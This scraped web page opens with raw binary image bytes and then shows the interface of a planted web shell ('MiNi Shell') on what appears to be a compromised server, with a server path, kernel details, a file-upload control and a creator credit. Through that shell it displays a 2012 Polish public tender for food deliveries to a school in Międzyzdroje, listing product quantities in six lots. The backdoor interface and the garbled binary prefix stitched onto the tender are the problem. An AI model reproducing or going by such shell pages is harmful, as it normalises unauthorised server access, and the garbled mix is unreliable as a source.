JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121119/456902-N-2012.html

<p class="kh_header"><b>Międzyzdroje: Dostawa produktów żywnościowych 
do Gimnazjum nr 1 im. Jana Pawła II w Międzyzdrojach przy ul. Kolejowej 33</b><br>
<b>Numer ogłoszenia: 456902 - 2012; data zamieszczenia: 19.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum nr 1 im. Jana Pawła II , ul. Kolejowa 33, 72-500 Międzyzdroje, woj. zachodniopomorskie, tel. 0 91 328 03 44, faks 0 91 328 03 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gm1.biposwiata.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów żywnościowych 
do Gimnazjum nr 1 im. Jana Pawła II w Międzyzdrojach przy ul. Kolejowej 33.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest sukcesywna dostawa transportem własnym Wykonawcy do siedziby Zamawiającego produktów żywnościowych, z podziałem na zadania - liczba zadań - 6. 
Szczegółowy zakres dostaw obejmują załączniki od nr 5 do nr 10 do niniejszej specyfikacji.
Zadanie 1- załącznik nr 5 - produkty należące do grupy: 15100000-9
Zadanie 2- załącznik nr 6 - produkty należące do grup: 15800000-6,  15600000-4, 15400000-2
Zadanie 3- załącznik nr 7 - produkty należące do grupy: 03200000-3, 03100000-2
Zadanie 4- załącznik nr 8 - produkty należące do grupy: 15330000-0
Zadanie 5- załącznik nr 9 - produkty należące do grupy: 15331170-9, 15200000-0
Zadanie 6- załącznik nr 10 - produkty należące do grupy: 15500000-3.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca złoży oświadczenie  o spełnianiu warunków w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca złoży oświadczenie  o spełnianiu warunków w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca złoży oświadczenie  o spełnianiu warunków w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca złoży oświadczenie  o spełnianiu warunków w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku jeżeli Wykonawca złoży oświadczenie  o spełnianiu warunków w postępowaniu o zamówienie publiczne z art.22 ust.1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się następujące możliwości zmiany treści umowy:
zmiana wysokości ceny brutto oferty - w przypadku urzędowej zmiany stawki podatku VAT cena podlega automatycznej waloryzacji odpowiednio o kwotę podatku VAT wynikajacą ze stawki tego podatku obowiązującą w chwili powstania obowiązku podatkowego. Cena netto pozostaje bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> gm1.biposwiata.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum nr 1 im. Jana Pawła II, ul. Kolejowa 33, 72-500 Międzyzdroje.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 09:50, miejsce: Sekretariat Gimnazjum nr 1 im. Jana Pawła II, ul. Kolejowa 33, 72-500 Międzyzdroje.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów:Kurczęta św.-	kg 575; Filet z piersi kurczaka-kg 200; Filet z indyka-kg 40; Łopatka b/k	-kg 580; Schab b/k-kg 325; Szynka surowa b/k-kg 245; Karkówka b/k-kg 30; Żeberka wieprzowe paski-kg 25; Golonka wieprzowa tylnia-kg 15; Boczek św. bez żeber-	kg 30; Szynka gotowana-kg 8;
Boczek wędzony surowy b/ż extra- kg	90; Kiełbasa śląska-kg 50; Kiełbasa biała surowa-kg 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Różne produkty spożywcze; Produkty przemiału ziarna, skrobi i produktów skrobiowych; Oleje i tłuszcze zwierzęce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów: Różne produkty spożywcze:
Cukier biały 1kg-kg	380; Kakao 100-250 g-kg 2; Batony czekoladowe nadziewane 20-55g-szt 1500; Wyroby cukiernicze w/cz 25-40g-szt 1000;
Wyroby cukiernicze b/cz 25-40g-szt 1300;
Produkty z ciasta makaronowego:				
Makaron świderki 400-500g-	kg 150; Makaron nitka 250-500g-kg 60;
Makaron wstążka 400-500g-	kg 30; Makaron spaghetti 500-1000g-	kg 90;
Ocet lub produkty równoważne:				
Ocet spirytusowy 0,5 l-litr 15; Ketchup 450-1000g-kg 35; Musztarda 180-200g-
kg 15; Majonez 250-1000g-	kg 40;
Przyprawy i przyprawy korzenne:				
Pieprz czarny mielony 20-1000g-kg 8; Zioła: Oregano 10-500g-kg 1;
Tymianek 10-500g-kg 1; Majeranek 20-500g-kg	 4; Mieszanki przypraw: Przyprawa warzywna 200-1000g-kg 60; Sól warzona-kg 150;
Róne produkty spożywcze:				
Kwasek cytrynowy 50-1000g-kg ;2 Liść laurowy 6-500g-	kg 2;
Papryka mielona ostra 20-1000g- kg 2;Papryka mielona słodka 20-1000g-kg 4;
Pieprz ziołowy 20-1000g-kg 3; Ziele angielskie 12-1000g-	kg 3; Cukier waniliowy 30-1000g-kg	 10; Bułka tarta 500-1000g-	kg 200; Czosnek granulowany 20-1000g-
kg 6; Curry 18-1000g-kg 2; Bita śmietana w proszku- kg 15; Zupy:	Żurek 50-1000g-kg 7; Barszcz bialy 50-1000g-kg 7; Ekstrakty warzywne:	Przyprawa do zup w płynie 0,7-1l-litr160; Chleb zwykły krojony 800g	-szt 50;Woda mineralna niegazowana 0,5l-	szt 800; Produkty przemiału ziarna,skrobi i produktów skrobiowych:Produkty z ziaren zbóż: Kasza jęczmienna wiejska-kg 110;
Kasza manna-kg 5; Ryż biały długoziarnisty-kg 160; Mąka pszenna Typ 500-	kg 300; Skrobia i produkty skrobiowe: Kisiel-kg 5; Skrobia ziemniaczana-kg 10;
Oleje i tłuszcze zwierz. lub rośl.:Olej roślinny 0,9-1 litr-litr	485; Margaryna zwykła 250-500g	-kg 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zboża, ziemniaki, warzywa, owoce i orzechy: Produkty rolnictwa i ogrodnictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów:Zboża, ziemniaki, warzywa, owoce i orzechy				
Ziemniaki		kg		7200
Ziemniak młody		kg		150
Burak ćwikłowy		kg		500
Marchew		kg		800
Cebula		kg		350
Rzepa 		kg		15
Papryka czerwona		kg		10
Pomidory		kg		70
Ogórki 		kg		225
Sałata		szt		230
Sałata lodowa		szt		120
Kapusta				
Kapusta biała		kg		550
Kapusta młoda		szt		50
Kapusta czerwona		kg		120
Kapusta pekińska		kg		270
Kapusta włoska		kg		30
Banany		kg		180
Cytryny		kg		2
Pomarańcze		kg		180
Mandarynki		kg		150
Jabłka odmiana deserowa		kg		350
Brzoskwinie		kg		90
Warzywa korzeniowe i bulwiaste				
Seler		kg		175
Por		kg		50
Botwina		pęcz.		50
Szczaw		pęcz.		100
Szczypior		pęcz.		50
Rzodkiewka		pęcz.		50
Natka pietruszki		pęcz.		240
Koper		pęcz.		450
Grzyby				
Pieczarki		kg		110
Produkty rolnictwa i ogrodnictwa				
Jaja  63-73g kl.I            		szt		1800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.10.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przetworzone owoce i warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów:Przetworzone owoce i warzywa				
Fasola przetworzona				
Fasola  Jaś		kg		30
Fasola biała drobna		kg		20
Groch dzielony łuskany		kg		25
Grzyby przetworzone				
Podgrzybek suszony		kg		2
Kapusta przetworzona				
Kapusta kiszona		kg		300
Skoncentr. przwcier pomidorowy 800-1000g		kg		70
Grzyby puszkowane				
Pieczarki krojone w zalewie 1,7-3 l		l		20
Groch puszkowany 400-500g		kg		18
Kukurydza słodka 400-500g		kg		14
Warzywa konserwowane w occie				
Ogórek konserwowy 900-2000g		kg		125
Papryka konserwowa 500-1000g		kg		22
Galaretka owocowa 70-1000g		kg		10
Sułtanki 100-1000g		kg		5
Przetworzone owoce				
Kompot wiśniowy 0,9-3,5l		litr		90
Kompot węgierkowy 0,9-3,5l		litr		135
Kompot czarna porzeczka 0,9-3,5l		litr		175
Kompot truskawkowy 0,9-3,5l		litr		75
Brzoskwinie w syropie połówki 800-1500g		kg		38
Ananas plastry  500-1500g		kg		22
Warzywa przetworzone				
Ogórki kwaszone 		kg		150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa mrożone; Ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów:Warzywa mrożone				
Brukselka  0,4 - 2,5 kg		kg		11
Brokuł  0,4 - 2,5 kg		kg		80
Kalafior 0,4 - 2,5 kg		kg		112
Fasolka szparagowa zielona cięta 0,4-2,5 kg		kg		120
Fasolka żółta cała 0,4 - 2,5 kg		kg		20
Marchew kostka 0,4 - 2,5 kg		kg		10
Papryka czerwona paski 0,4 - 2,5 kg		kg		45
Mieszanka do potraw chińskich 0,4-2,5 kg		kg		20
Ryby przetworzone i konserw.				
Mrożone filety rybne b/s				
Filet z mintaja 		kg		120
Śledź przetworzony lub konser.				
Filet śledziowy solony		kg		10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna dostawa produktów:Produkty mleczarskie				
Mleko UHT 2% 1litr		litr		110
Śmietana 18% ukwaszona 0,5-1 litr		litr		290
Śmietana UHT 18% 0,5-1 litr		litr		80
Masło niesolone min.82% tł.  200-250g		kg		65
Ser twarogowy mielony		kg		110
Ser żółty ( twardy)		kg		32.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com